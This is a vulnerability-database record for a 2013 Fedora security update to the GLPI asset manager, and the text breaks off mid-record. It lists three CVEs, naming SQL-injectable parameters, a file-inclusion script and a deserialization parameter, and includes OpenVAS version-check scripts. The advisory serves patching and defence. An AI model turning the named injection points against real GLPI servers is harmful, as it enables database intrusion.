ID FEDORA:C06082218D Type fedora Reporter Fedora Modified 2013-07-05T02:08:10
Description
GLPI is the Information Resource-Manager with an additional Administration- Interface. You can use it to build up a database with an inventory for your company (computer, software, printers...). It has enhanced functions to make the daily life for the administrators easier, like a job-tracking-system wi th mail-notification and methods to build a database with basic information about your network-topology.
{"id": "FEDORA:C06082218D", "type": "fedora", "bulletinFamily": "unix", "title": "[SECURITY] Fedora 18 Update: glpi-0.83.9.1-1.fc18", "description": "GLPI is the Information Resource-Manager with an additional Administration- Interface. You can use it to build up a database with an inventory for your company (computer, software, printers...). It has enhanced functions to make the daily life for the administrators easier, like a job-tracking-system wi th mail-notification and methods to build a database with basic information about your network-topology. ", "published": "2013-07-05T02:08:10", "modified": "2013-07-05T02:08:10", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "", "reporter": "Fedora", "references": [], "cvelist": ["CVE-2013-2225", "CVE-2013-2226", "CVE-2013-2227"], "lastseen": "2020-12-21T08:17:51", "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-2226", "CVE-2013-2227", "CVE-2013-2225"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310866043", "OPENVAS:866045", "OPENVAS:1361412562310866045", "OPENVAS:1361412562310866607", "OPENVAS:866607", "OPENVAS:866043"]}, {"type": "nessus", "idList": ["FEDORA_2013-11396.NASL", "FEDORA_2013-11413.NASL", "FEDORA_2013-11315.NASL", "MANDRIVA_MDVSA-2013-240.NASL"]}, {"type": "fedora", "idList": ["FEDORA:9243121041", "FEDORA:CBD3C22326"]}, {"type": "exploitdb", "idList": ["EDB-ID:26530", "EDB-ID:26366"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:122242"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13311"]}], "modified": "2020-12-21T08:17:51", "rev": 2}, "score": {"value": 5.2, "vector": "NONE", "modified": "2020-12-21T08:17:51", "rev": 2}, "vulnersScore": 5.2}, "affectedPackage": [{"OS": "Fedora", "OSVersion": "18", "arch": "any", "packageName": "glpi", "packageVersion": "0.83.9.1", "packageFilename": "UNKNOWN", "operator": "lt"}]}
{"cve": [{"lastseen": "2020-12-09T19:52:40", "description": "Multiple SQL injection vulnerabilities in GLPI before 0.83.9 allow remote attackers to execute arbitrary SQL commands via the (1) users_id_assign parameter to ajax/ticketassigninformation.php, (2) filename parameter to front/document.form.php, or (3) table parameter to ajax/comments.php.", "edition": 5, "cvss3": {}, "published": "2014-05-14T19:55:00", "title": "CVE-2013-2226", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2226"], "modified": "2014-05-15T12:44:00", "cpe": ["cpe:/a:glpi-project:glpi:0.83.1", "cpe:/a:glpi-project:glpi:0.83.2", "cpe:/a:glpi-project:glpi:0.83.3", "cpe:/a:glpi-project:glpi:0.83.6", "cpe:/a:glpi-project:glpi:0.83.5", "cpe:/a:glpi-project:glpi:0.83.31", "cpe:/a:glpi-project:glpi:0.83.4", "cpe:/a:glpi-project:glpi:0.83", "cpe:/a:glpi-project:glpi:0.83.8", "cpe:/a:glpi-project:glpi:0.83.7"], "id": "CVE-2013-2226", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2226", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:glpi-project:glpi:0.83.1:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.83.7:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.83:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.83.3:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.83.6:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.83.8:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.83.2:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.83.5:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.83.4:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.83.31:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:45:59", "description": "GLPI 0.83.7 has Local File Inclusion in common.tabs.php.", "edition": 4, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-11-01T17:15:00", "title": "CVE-2013-2227", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2227"], "modified": "2019-11-04T20:00:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "cpe:/a:glpi-project:glpi:0.83.7"], "id": "CVE-2013-2227", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2227", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.83.7:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:52:40", "description": "inc/ticket.class.php in GLPI 0.83.9 and earlier allows remote attackers to unserialize arbitrary PHP objects via the _predefined_fields parameter to front/ticket.form.php.\nPer: http://cwe.mitre.org/data/definitions/502.html\n\n\"CWE-502: Deserialization of Untrusted Data\"", "edition": 5, "cvss3": {}, "published": "2014-05-27T14:55:00", "title": "CVE-2013-2225", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2225"], "modified": "2014-05-28T17:07:00", "cpe": ["cpe:/a:glpi-project:glpi:0.68.1", "cpe:/a:glpi-project:glpi:0.80.1", "cpe:/a:glpi-project:glpi:0.83.1", "cpe:/a:glpi-project:glpi:0.72.4", "cpe:/a:glpi-project:glpi:0.78", "cpe:/a:glpi-project:glpi:0.20", "cpe:/a:glpi-project:glpi:0.68.2", "cpe:/a:glpi-project:glpi:0.71.5", "cpe:/a:glpi-project:glpi:0.41", "cpe:/a:glpi-project:glpi:0.72.1", "cpe:/a:glpi-project:glpi:0.72", "cpe:/a:glpi-project:glpi:0.21", "cpe:/a:glpi-project:glpi:0.78.3", "cpe:/a:glpi-project:glpi:0.83.2", "cpe:/a:glpi-project:glpi:0.83.3", "cpe:/a:glpi-project:glpi:0.83.6", "cpe:/a:glpi-project:glpi:0.80.2", "cpe:/a:glpi-project:glpi:0.83.5", "cpe:/a:glpi-project:glpi:0.80.5", "cpe:/a:glpi-project:glpi:0.80.6", "cpe:/a:glpi-project:glpi:0.70", "cpe:/a:glpi-project:glpi:0.83.31", "cpe:/a:glpi-project:glpi:0.71.3", "cpe:/a:glpi-project:glpi:0.71.4", "cpe:/a:glpi-project:glpi:0.51a", "cpe:/a:glpi-project:glpi:0.80.4", "cpe:/a:glpi-project:glpi:0.71.6", "cpe:/a:glpi-project:glpi:0.83.9", "cpe:/a:glpi-project:glpi:0.80.3", "cpe:/a:glpi-project:glpi:0.6", "cpe:/a:glpi-project:glpi:0.78.5", "cpe:/a:glpi-project:glpi:0.65", "cpe:/a:glpi-project:glpi:0.68.3", "cpe:/a:glpi-project:glpi:0.83.4", "cpe:/a:glpi-project:glpi:0.80.61", "cpe:/a:glpi-project:glpi:0.40", "cpe:/a:glpi-project:glpi:0.78.2", "cpe:/a:glpi-project:glpi:0.72.2", "cpe:/a:glpi-project:glpi:0.78.1", "cpe:/a:glpi-project:glpi:0.5", "cpe:/a:glpi-project:glpi:0.42", "cpe:/a:glpi-project:glpi:0.31", "cpe:/a:glpi-project:glpi:0.72.3", "cpe:/a:glpi-project:glpi:0.30", "cpe:/a:glpi-project:glpi:0.70.1", "cpe:/a:glpi-project:glpi:0.71", "cpe:/a:glpi-project:glpi:0.83", "cpe:/a:glpi-project:glpi:0.51", "cpe:/a:glpi-project:glpi:0.83.8", "cpe:/a:glpi-project:glpi:0.70.2", "cpe:/a:glpi-project:glpi:0.71.2", "cpe:/a:glpi-project:glpi:0.78.4", "cpe:/a:glpi-project:glpi:0.83.7", "cpe:/a:glpi-project:glpi:0.71.1", "cpe:/a:glpi-project:glpi:0.68", "cpe:/a:glpi-project:glpi:0.80.7", "cpe:/a:glpi-project:glpi:0.80"], "id": "CVE-2013-2225", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2225", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:a:glpi-project:glpi:0.6:rc1:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.78:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.70.2:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.83.9:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.71.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.68:rc2:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.72.2:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.80.1:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.78.3:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.78.2:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.40:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.6:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.5:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.71.3:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.68:rc1:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.21:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.5:rc1:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.5:rc2:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.83.1:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.71.4:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.83.7:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.68.2:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.83:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.78.5:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.83.3:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.72:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.83.6:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.65:rc1:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.71.1:rc3:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.70.1:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.72.3:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.6:rc2:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.65:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.71.5:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.20:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.30:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.42:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.71.1:rc2:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.71.1:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.80:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.83.8:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.72:rc1:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.80.2:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.72:rc2:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.31:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.83.2:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.80.61:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.70:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.72.1:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.83.5:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.68.1:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.70:rc3:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.65:rc2:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.68.3:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.72.4:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.80.6:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.80.5:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.51a:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.71.2:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.78.4:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.72:rc3:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.70:rc1:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.51:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.41:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.6:rc3:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.80.4:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.80.3:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.70:rc2:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.71:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.83.4:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.68:rc3:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.83.31:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.71.6:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.78.1:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.68:*:*:*:*:*:*:*", "cpe:2.3:a:glpi-project:glpi:0.80.7:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2019-05-29T18:38:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2227", "CVE-2013-2225", "CVE-2013-2226"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-07-05T00:00:00", "id": "OPENVAS:1361412562310866045", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310866045", "type": "openvas", "title": "Fedora Update for glpi FEDORA-2013-11396", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for glpi FEDORA-2013-11396\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.866045\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-07-05 12:56:54 +0530 (Fri, 05 Jul 2013)\");\n script_cve_id(\"CVE-2013-2226\", \"CVE-2013-2225\", \"CVE-2013-2227\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for glpi FEDORA-2013-11396\");\n script_xref(name:\"FEDORA\", value:\"2013-11396\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2013-July/110788.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'glpi'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC18\");\n script_tag(name:\"affected\", value:\"glpi on Fedora 18\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"glpi\", rpm:\"glpi~0.83.9.1~1.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-01-24T11:10:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2227", "CVE-2013-2225", "CVE-2013-2226"], "description": "Check for the Version of glpi", "modified": "2018-01-24T00:00:00", "published": "2013-07-05T00:00:00", "id": "OPENVAS:866045", "href": "http://plugins.openvas.org/nasl.php?oid=866045", "type": "openvas", "title": "Fedora Update for glpi FEDORA-2013-11396", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for glpi FEDORA-2013-11396\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"glpi on Fedora 18\";\ntag_insight = \"GLPI is the Information Resource-Manager with an additional Administration-\n Interface. You can use it to build up a database with an inventory for your\n company (computer, software, printers...). It has enhanced functions to make\n the daily life for the administrators easier, like a job-tracking-system with\n mail-notification and methods to build a database with basic information\n about your network-topology.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(866045);\n script_version(\"$Revision: 8509 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-24 07:57:46 +0100 (Wed, 24 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-07-05 12:56:54 +0530 (Fri, 05 Jul 2013)\");\n script_cve_id(\"CVE-2013-2226\", \"CVE-2013-2225\", \"CVE-2013-2227\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for glpi FEDORA-2013-11396\");\n\n script_xref(name: \"FEDORA\", value: \"2013-11396\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2013-July/110788.html\");\n script_tag(name: \"summary\" , value: \"Check for the Version of glpi\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"glpi\", rpm:\"glpi~0.83.9.1~1.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:52:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2227", "CVE-2013-2225", "CVE-2013-2226"], "description": "Check for the Version of glpi", "modified": "2017-07-10T00:00:00", "published": "2013-07-05T00:00:00", "id": "OPENVAS:866043", "href": "http://plugins.openvas.org/nasl.php?oid=866043", "type": "openvas", "title": "Fedora Update for glpi FEDORA-2013-11413", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for glpi FEDORA-2013-11413\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"glpi on Fedora 17\";\ntag_insight = \"GLPI is the Information Resource-Manager with an additional Administration-\n Interface. You can use it to build up a database with an inventory for your\n company (computer, software, printers...). It has enhanced functions to make\n the daily life for the administrators easier, like a job-tracking-system with\n mail-notification and methods to build a database with basic information\n about your network-topology.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(866043);\n script_version(\"$Revision: 6628 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:32:47 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-07-05 12:56:31 +0530 (Fri, 05 Jul 2013)\");\n script_cve_id(\"CVE-2013-2226\", \"CVE-2013-2225\", \"CVE-2013-2227\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for glpi FEDORA-2013-11413\");\n\n script_xref(name: \"FEDORA\", value: \"2013-11413\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2013-July/110794.html\");\n script_summary(\"Check for the Version of glpi\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"glpi\", rpm:\"glpi~0.83.9.1~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-18T11:09:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2227", "CVE-2013-2225", "CVE-2013-2226"], "description": "Check for the Version of glpi", "modified": "2018-01-17T00:00:00", "published": "2013-08-20T00:00:00", "id": "OPENVAS:866607", "href": "http://plugins.openvas.org/nasl.php?oid=866607", "type": "openvas", "title": "Fedora Update for glpi FEDORA-2013-11315", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for glpi FEDORA-2013-11315\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(866607);\n script_version(\"$Revision: 8448 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-17 17:18:06 +0100 (Wed, 17 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-08-20 15:18:03 +0530 (Tue, 20 Aug 2013)\");\n script_cve_id(\"CVE-2013-2226\", \"CVE-2013-2225\", \"CVE-2013-2227\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for glpi FEDORA-2013-11315\");\n\n tag_insight = \"GLPI is the Information Resource-Manager with an additional Administration-\nInterface. You can use it to build up a database with an inventory for your\ncompany (computer, software, printers...). It has enhanced functions to make\nthe daily life for the administrators easier, like a job-tracking-system with\nmail-notification and methods to build a database with basic information\nabout your network-topology.\n\";\n\n tag_affected = \"glpi on Fedora 19\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2013-11315\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2013-July/110621.html\");\n script_tag(name: \"summary\" , value: \"Check for the Version of glpi\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks 